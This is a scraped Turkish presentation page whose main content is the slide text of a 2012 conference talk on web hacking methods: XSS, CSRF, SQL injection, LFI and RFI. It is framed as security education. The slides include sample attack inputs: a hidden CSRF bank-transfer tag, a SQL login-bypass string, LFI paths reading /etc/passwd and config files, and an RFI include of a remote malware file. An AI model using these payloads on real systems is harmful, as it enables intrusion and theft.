08 Eylül 2012 tarihinde Haliç Kongre ve Kültür Merkezi'nde gerçekleştirmiş olduğumuz "Web Saldırıları ve Web Güvenliği" konferansında "Web Hacking Yöntemleri" konu başlıklı sunumum.
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliğiEPICROUTERSBilge Adam Bilgi Teknolojileri Akademisi - Beşiktaş Şube'sinde Sn. Neslihan Türkeri'nin katkıları ile 22.04.2012 tarihinde gerçekleştirilen Ethical Hacking ve Sızma Yöntemleri konu başlıklı eğitime ait etkinlik fotoğrafları ve etkinlik sunumu.
Zafiyet tespiti ve sizma yöntemleriEPICROUTERS12.04.2012 Tarihinde Çorlu Namık Kemal Üniversitesi ev sahipliğinde, Gökmen Güreşçi tarafından düzenlenen İnternet Haftası etkinliklerinde LabSec Community olarak yerimizi aldık.
Bilge adam beşiktas şube ceh 1. introductionEPICROUTERSBilge Adam Bilgi Teknolojileri Akademisi - Beşiktaş Şube'sinde 01.04.2012 tarihinde gerçekleştirilen "Ethical Hacking ve Kurumsal Networklerde Sızma Testleri" konu başlıklı eğitime ait etkinlik sunumu.
Web Güvenlik Açıkları ve Kullanımı (Geniş Anlatım)Mehmet KelepçeWeb Güvenlik Zaafiyetlerinin bulunumu ve kullanımını geniş olarak ele aldım.
İçerik:
SQL İnjection ve çeşitleri
XSS ve çeşitleri
LFI RFI
CSRF XSRF
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma SaldırılarıPRISMA CSIBu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)PRISMA CSIBu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıPRISMA CSIBu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriPRISMA CSIBu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıCypSec - Siber Güvenlik KonferansıUluslararası siber savaşlarda kullanılacak en önemli bileşenlerden biri de son kullanıcıların internet bağlantıları için kullandıkları soho modemlerdir. Bu sistemler genellikle aynı özellikleri taşıdığından tespit edilecek bir açıklık tüm ülkeyi etkileyecektir. Sunum süresince böyle bir kitle saldırısının nasıl gerçekleştirileceği, ev kullanıcılarının modemlerini hedef alan bir ar-ge çalışmasının adımları ve sonuçları üzerinden ele alınacaktır. Çalışmanın içeriğindeki ana başlıklar, belli özelliklerdeki hedeflerin belirlenmesi, etkili bir zafiyetin bulunması, gömülü sistemler (MIPS) gibi farklı zorlukları olan platformlar için istismar kodunun yazılması, toplu istismarı gerçekleştirecek betiklerin yazılması, büyük ölçekli taramalar için performans optimizasyonlarının yapılması olarak sayılabilir.
Kaynak Kod Analiz SüreciPRISMA CSIPRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Web Uygulamalarında Risk Yönetimi ve DeğerlendirmeErkan BaşavcıInternet/Intranet Web Uygulamaları Altyapısı için NIST ölçütlerine göre Risk Yönetim ve Değerlendirme Dokümanı
Hacking Uygulamaları ve AraçlarıMustafa Hacking uygulamalarını ve bu uygulamalara ait araçları gösteren ve notes bölümde bilgilerin yer aldığı detaylı güvenlik sunumu
WannaCry - NotPetya OlaylarıAlper Başaran2017 Yılının yaz aylarına damgasını vuran WannaCry ve NotPetya fidye yazılım saldırılarıyla ilgili öne çıkan noktaları özetledik.
Sızma Testlerinde Parola Kırma SaldırılarıBGA Cyber SecurityBilgi Güvenliği Akademisi tarafından hazırlanan, hedef sistem belli zaafiyetler ile ele geçirildikten sonra sistemdeki Kullanıcıların parolarını nasıl kırılacağı anlatılmıştır.
SIZMA TESTLERİNDE BİLGİ TOPLAMABGA Cyber SecuritySızma testi eğitimlerimiz için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 1]
PORT TARAMA ve KEŞİF ÇALIŞMALARI BGA Cyber SecuritySızma testi çalışmaları için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 2]
GÜVENLİK SİSTEMLERİNİ ATLATMABGA Cyber SecuritySızma testi çalışmaları için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 4]
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)PRISMA CSIBu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıPRISMA CSIBu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriPRISMA CSIBu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.
PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıCypSec - Siber Güvenlik KonferansıUluslararası siber savaşlarda kullanılacak en önemli bileşenlerden biri de son kullanıcıların internet bağlantıları için kullandıkları soho modemlerdir. Bu sistemler genellikle aynı özellikleri taşıdığından tespit edilecek bir açıklık tüm ülkeyi etkileyecektir. Sunum süresince böyle bir kitle saldırısının nasıl gerçekleştirileceği, ev kullanıcılarının modemlerini hedef alan bir ar-ge çalışmasının adımları ve sonuçları üzerinden ele alınacaktır. Çalışmanın içeriğindeki ana başlıklar, belli özelliklerdeki hedeflerin belirlenmesi, etkili bir zafiyetin bulunması, gömülü sistemler (MIPS) gibi farklı zorlukları olan platformlar için istismar kodunun yazılması, toplu istismarı gerçekleştirecek betiklerin yazılması, büyük ölçekli taramalar için performans optimizasyonlarının yapılması olarak sayılabilir.
Kaynak Kod Analiz SüreciPRISMA CSIPRISMA CSI • Cyber Security and Intelligence www.prismacsi.com
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
Web Uygulamalarında Risk Yönetimi ve DeğerlendirmeErkan BaşavcıInternet/Intranet Web Uygulamaları Altyapısı için NIST ölçütlerine göre Risk Yönetim ve Değerlendirme Dokümanı
Hacking Uygulamaları ve AraçlarıMustafa Hacking uygulamalarını ve bu uygulamalara ait araçları gösteren ve notes bölümde bilgilerin yer aldığı detaylı güvenlik sunumu
WannaCry - NotPetya OlaylarıAlper Başaran2017 Yılının yaz aylarına damgasını vuran WannaCry ve NotPetya fidye yazılım saldırılarıyla ilgili öne çıkan noktaları özetledik.
Sızma Testlerinde Parola Kırma SaldırılarıBGA Cyber SecurityBilgi Güvenliği Akademisi tarafından hazırlanan, hedef sistem belli zaafiyetler ile ele geçirildikten sonra sistemdeki Kullanıcıların parolarını nasıl kırılacağı anlatılmıştır.
SIZMA TESTLERİNDE BİLGİ TOPLAMABGA Cyber SecuritySızma testi eğitimlerimiz için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 1]
PORT TARAMA ve KEŞİF ÇALIŞMALARI BGA Cyber SecuritySızma testi çalışmaları için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 2]
GÜVENLİK SİSTEMLERİNİ ATLATMABGA Cyber SecuritySızma testi çalışmaları için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 4]
Bilge adam beşiktas şube ceh 2 hackingEPICROUTERSBilge Adam Bilgi Teknolojileri Akademisi - Beşiktaş Şube'sinde 01.04.2012 tarihinde gerçekleştirilen "Ethical Hacking ve Kurumsal Networklerde Sızma Testleri" konu başlıklı eğitime ait etkinlik sunumu.
Atilim üniversitesi ceh sunumEPICROUTERS03/05/2011 Tarihinde ASES (Atılım Software Enginer Society) Yönetim Kurulu Başkanı Funda YILMAZ tarafından Atılım Üniversitesi Mühendislik Fakültesi, Cevdet Kösemen Konferans Salonunda düzenlenen etkinlik için hazırlanan sunum
İnternet Üzerinde Anonimlik ve Tespit YöntemleriBGA Cyber Securityİstanbul Şehir Üniversitesi - İnternet Üzerinde Anonimlik ve Tespit Yöntemleri - Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı - Bilgisayar Adli Analizi Dersi
Hazırlayan: Muhammed Zaid Alperen
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ BGA Cyber SecuritySızma testi çalışmaları için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 6]
VERİTABANI SIZMA TESTLERİBGA Cyber SecuritySızma testi çalışmaları için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 7]
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber SecuritySızma testi çalışmaları için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 9]
Kablosuz Ağlara Yapılan SaldırılarBGA Cyber Securityİstanbul Şehir Üniversitesi - Kablosuz Ağlara Yapılan Saldırılar - Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Bilgisayar Adli Analizi Dersi
Hazırlayan: Hüseyin Uçan
PAROLA KIRMA SALDIRILARIBGA Cyber SecuritySızma testi çalışmaları için BGA Bilgi Güvenliği A.Ş olarak hazırladığımız uygulama kitabı
Pentest Eğitimi Uygulama Kitabı [Bölüm 5]
Gazi Universitesi Bilisim Gunleri '09Onur YILMAZGazi Üniversitesi Bilgisayar Mühendisliği Topluluğu tarafından hazırlanan Bilişim Günleri '09 etkinliğinde yaptığım sunum.
Burp Suite İle File Upload Attack | OWASP Istanbul Rumeysa Bozdemir30 Ocak 2022 tarihinde #owaspistanbul etkinliğinde gerçekleştirdiğim sunumu görmektesiz. Burp Suite web proxy uygulaması kullanılarak nasıl File Upload Attack gerçekleştirilebilir anlatılmış ve Lab ortamında uygulması gerçekleştirilmiştir. Etkinlik sunumuna youtube kanalımdan erişebilirsiniz. (Bilişimci Kız) Sunumun detaylı makale hali https://bilisimcikiz.com adresinde yer almaktadır.
Temel web güvenliğiSerdar Buyuktemizweb uygulaması geliştiriciler için temel seviyede güvenlik üzerine bir sunum,
alt başlıklar şunlar.
owasp,
https,
bcrypt,
csrf,
xss,
fiddler,
netsparker
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber SecurityHuzeyfe Önal “Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı”
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİTulay CandarCRYPTTECH NG Siber Güvenlik ürünlerimizdeki, yeni geliştirilen özellikler, ürün ara yüzlerindeki değişimler konulu sunum.
Tarık Kobalas
CRYPTTECH Teknoloji Direktörü
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECHCRYPTTECH NG Siber Güvenlik ürünlerindeki, yeni geliştirilen özellikler, ürün ön yüz ve teknolojilerinde yapılan inovasyonlar konulu sunum.
Tarık KOBALAS
Teknoloji Direktörü
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14Siber Güvenlik DerneğiSiber Güvenlik Konferansı'14 etkinliğinde Mehmet İnce tarafından gerçekleştirilen sunum dosyasıdır.
2. • Bilgi Teknolojileri Güvenlik Danışmanı
• White Hat Hacker
• Ethical Hacking Eğitmeni
• Blog Yazarı (www.eyupcelik.com.tr)
• Web Güvenliği Editörü (www.webguvenligi.net)
• LabSec Community - Güvenlik Ekip Lideri
• Anatolia Security - Proje Takım Lideri
• Güvenlik Araştırmacısı (Security Research)
– PacketStormSecurity.org
– Exploit-db.com
– Secunia.com
3. • Web Hacking Yöntemleri
• Bilgi Toplama
• Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi
• Hata Mesajlarından Bilgi Toplama
• Arama Motorlarından Bilgi Toplama
• Alt Dizin ve Admin Panel Keşfi
• Web Güvenlik Testlerinde Kişisel Proxyler
• OWASP Top 10 Açıklık Rehberi
• XSS, CSRF Açıkları ve Kötüye Kullanımı
• XSS, CSRF Nedir?
• XSS, CSRF Kullanımı
• SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları
• SQL Injection ve Blind SQL Injection Nedir?
• SQL – Blind SQL Kullanımı
• SQL Injection Örnekleri
• Arama Motorlarından Zafiyet Arama
• Havij, Sqlmap, SQL Finder, Pangolin
• File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları
• Local File Inclusion (LFI)
• Remote File Inclusion (RFI)
• Web Shell
• Web Shell Kavramları ve Kullanım Amaçları
• PHP, ASP, JSP, ASP.NET Shell Çeşitleri
12. • Web Hacking Yöntemleri
• Bilgi Toplama
• Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi
• Hata Mesajlarından Bilgi Toplama
• Arama Motorlarından Bilgi Toplama
• Alt Dizin ve Admin Panel Keşfi
• Web Güvenlik Testlerinde Kişisel Proxyler
• OWASP Top 10 Açıklık Rehberi
• XSS, CSRF Açıkları ve Kötüye Kullanımı
• XSS, CSRF Nedir?
• XSS, CSRF Kullanımı
• SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları
• SQL Injection ve Blind SQL Injection Nedir?
• SQL – Blind SQL Kullanımı
• SQL Injection Örnekleri
• Arama Motorlarından Zafiyet Arama
• Havij, Sqlmap, SQL Finder, Pangolin
• File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları
• Local File Inclusion (LFI)
• Remote File Inclusion (RFI)
• Web Shell
• Web Shell Kavramları ve Kullanım Amaçları
• PHP, ASP, JSP, ASP.NET Shell Çeşitleri
14. • Sunucuya gönderilen yazılım betiklerinin (script) kullanıcının tarayıcısında çalıştığı bir
saldırı türüdür.
• PHP-ASP-ASP.NET Sayfalarında sıklıkla görülür.
• Genellikle POST ve GET metotlarının kullanıldığı alanlarda olur.
• Yazılım betiklerinin kullanıcı tarafında çalıştırılması sonucunda oturum bilgileri
çalınabilir, bilgisayarına zararlı kodlar enjekte edilebilir ve bilgisayar yönetimi ele
geçirilebilir.
• En çok karşılaşılan güvenlik zafiyetidir!
16. • URL adreslerindeki querystringler ve form alanlarında sıklıkla görülür.
• En çok karşılaşılan XSS saldırı türevidir.
• Kullanıcı taraflı çalışır.
• Phishing saldırılarına zemin oluşturur.
17. • Forumlar, ziyaretçi defterleri gibi alanlarda sıklıkla görülür.
• XSS kodları database sunucusuna kaydedilir.
• Kullanıcılar sayfaya eriştiklerinde XSS kodları çalışır ve amaca hizmet eder.
18. • XSS saldırısına benzer
• Web uygulamasının oturum zaman aşımlarını kullanmamasından kaynaklanır.
• XSS saldırılarının aksine CSRF saldırıları kullanıcı bazlıdır.
• Bu saldırı türünde, kullanıcının isteği dışında kullanıcıya işlemler yaptırılır.
• Banka hesaplarından para transferi, uygulama yetki yükseltme saldırıları gibi bir
çok işlem bu saldırı yöntemi ile yapılabilmektedir.
• Saldırganın amacı; yetkisi olmayan alanlarda istediği işlemi yetkisi olan bir
kullanıcıya yaptırmaktır.
• Örneğin; ING Direct bankasında bulunan CSRF zafiyeti, kullanıcının belirtilen
hesaba para transfer etmesini sağlamaktaydı.
19. • Web sitesinde oturum açan bir kullanıcı, eğer aynı zamanda zararlı kodun
bulunduğu sayfaya erişirse, hesabından başka bir hesaba para aktarılıyor
• Kullanıcı uygulamayı açtıktan sonra, zararlı sayfada
http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500
&submit=1 kodu çalıştırılır.
• Bunun için saldırgan yukarıda bulunan kodu sayfasında <img> veya <iframe>
tagları arasına yerleştirir.
• Bu tagler kullanıcının görmemesi için
<img src=/EPICROUTERS/web-guvenligi-konferansi-web-hacking-yontemleri/‚http:/www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛
width=‚0‛ height=‚0‛> şeklinde yada
<iframe src=/EPICROUTERS/web-guvenligi-konferansi-web-hacking-yontemleri/‚http:/www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛
width=‚0‛ height=‚0‛> şeklinde olacaktır.
• Bu kodlar kullanıcı tarafında çalışınca, Eyup adlı kullanıcın hesabından Ismail
adlı kullanıcın hesabına 500 TL aktarmış olacaktır.
20. • Web Hacking Yöntemleri
• Bilgi Toplama
• Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi
• Hata Mesajlarından Bilgi Toplama
• Arama Motorlarından Bilgi Toplama
• Alt Dizin ve Admin Panel Keşfi
• Web Güvenlik Testlerinde Kişisel Proxyler
• OWASP Top 10 Açıklık Rehberi
• XSS, CSRF Açıkları ve Kötüye Kullanımı
• XSS, CSRF Nedir?
• XSS, CSRF Kullanımı
• SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları
• SQL Injection ve Blind SQL Injection Nedir?
• SQL – Blind SQL Kullanımı
• SQL Injection Örnekleri
• Arama Motorlarından Zafiyet Arama
• Havij, Sqlmap, SQL Finder, Pangolin
• File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları
• Local File Inclusion (LFI)
• Remote File Inclusion (RFI)
• Web Shell
• Web Shell Kavramları ve Kullanım Amaçları
• PHP, ASP, JSP, ASP.NET Shell Çeşitleri
21. • Veritabanından sorgulamalar yapılırken, sorgulara bazı karakterlerin (‘)
eklenerek yetkisiz sorgulamalar yapılmasıdır.
• SQL injection yöntemi ile sql sunucusunda bulunan verilere
erişilebilir, değiştirilebilir , silinebilir
• SQL Injection son zamanlarda en tehlikeli saldırı türlerinden biri haline geldi.
• Web uygulamalarında bulunan SQL sorgularının doğru bir şekilde analiz
edilmeden SQL sunucusuna aktarılmasından kaynaklanan bir saldırı türüdü
• SQL’de iki tek tırnak (‘) yan yana gelince arada bulunan kodlar ‚string‛ olarak
kabul edilir.
• Örneğin; bir userın form alanına giriş yapacağı zaman girmiş olduğu input
değerler kontrol edilirken sql cümlecikleri kullanılır.
• SELECT * from kullanicilar where isim=‘eyup’ and sifre=‘x9x9’
• Böyle bir durumda, kullanıcılar tablosunda bulunan isim kolonunda ‚eyup‛ varsa
ve sifre kolonıundaki şifresi de eğer ‚x9x9‛ ise kullanıcı oturum açmış olacaktır.
• Kullanıcının form alanına girmiş olduğu input veriler where koşuluna
atanmaktadır.
22. • Bu mantıkla çalışan bir sitede sql injection saldırısı yapacaksak eğer, bize
kullanıcı adı ve şifreyi her zaman döndürecek bir koda ihityacımız olacaktır.
• Select * from kullanicilar where isim=‘’ OR ‘’ = ‘’ and sifre= ‘’ OR ‘’ = ‘’
• Kullanıcılar tablosundaki isim kolonu ve sifre kolonu boş olan kullanıcıları
istemiş olduk.
23. • ODBC (Open Database Connectivity) verikaynakları üzerinde veri taşımaya
yarayan bir araçtır.
• Bu işlemi verikaynağı ve uygulama arasında bir katman oluşturarak
gerçekleştirir.
• Error Based SQL Injection saldırıları, ODBC’nin verdiği hatalardan faydalanarak
verilere erişmeye çalışır.
• Çoğunlukla SQL Union operatöründen faydalanılarak bu hata verilerine erişilir.
24. • SQL injectionda kullanılan karakterlerin sonuç vermediği durumlarda kullanılan
bir saldırı yöntemidir.
• Bu yöntem alınan hataların True veya False kısmı ile ilgilenir.
• SQL üzerinde yapılan sorgulamaların doğru veya yanlış olduğu sonuçlarını bize
geri döndürür.
• Blind SQL Injection ile yapılan yöntemler deneme-yanılma yöntemi ile yapılır.
28. • Web Hacking Yöntemleri
• Bilgi Toplama
• Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi
• Hata Mesajlarından Bilgi Toplama
• Arama Motorlarından Bilgi Toplama
• Alt Dizin ve Admin Panel Keşfi
• Web Güvenlik Testlerinde Kişisel Proxyler
• OWASP Top 10 Açıklık Rehberi
• XSS, CSRF Açıkları ve Kötüye Kullanımı
• XSS, CSRF Nedir?
• XSS, CSRF Kullanımı
• SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları
• SQL Injection ve Blind SQL Injection Nedir?
• SQL – Blind SQL Kullanımı
• SQL Injection Örnekleri
• Arama Motorlarından Zafiyet Arama
• Havij, Sqlmap, SQL Finder, Pangolin
• File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları
• Local File Inclusion (LFI)
• Remote File Inclusion (RFI)
• Web Shell
• Web Shell Kavramları ve Kullanım Amaçları
• PHP, ASP, JSP, ASP.NET Shell Çeşitleri
29. • Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir
• Sunucuda bulunan dosyaların çağrılmasına ve okunabilmesine olanak verir
• Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir!
• index.php?SayfaAc=iletisim.php
• index.php?SayfaAc=../../configuration.php
• index.php?SayfaAc=../../../../etc/passwd
• index.php?SayfaAc=../../../boot.ini
30. • Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir
• RFI saldırılarında en büyük etken değişkene değer atanmamasıdır!
• Tanımlanmış ancak değer atanmamış olan değişkene dışardan değer aktarılması
ile oluşur.
• Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir!
• include($deger‛.php‛)
• index.php?deger=http://www.site.com/malware.txt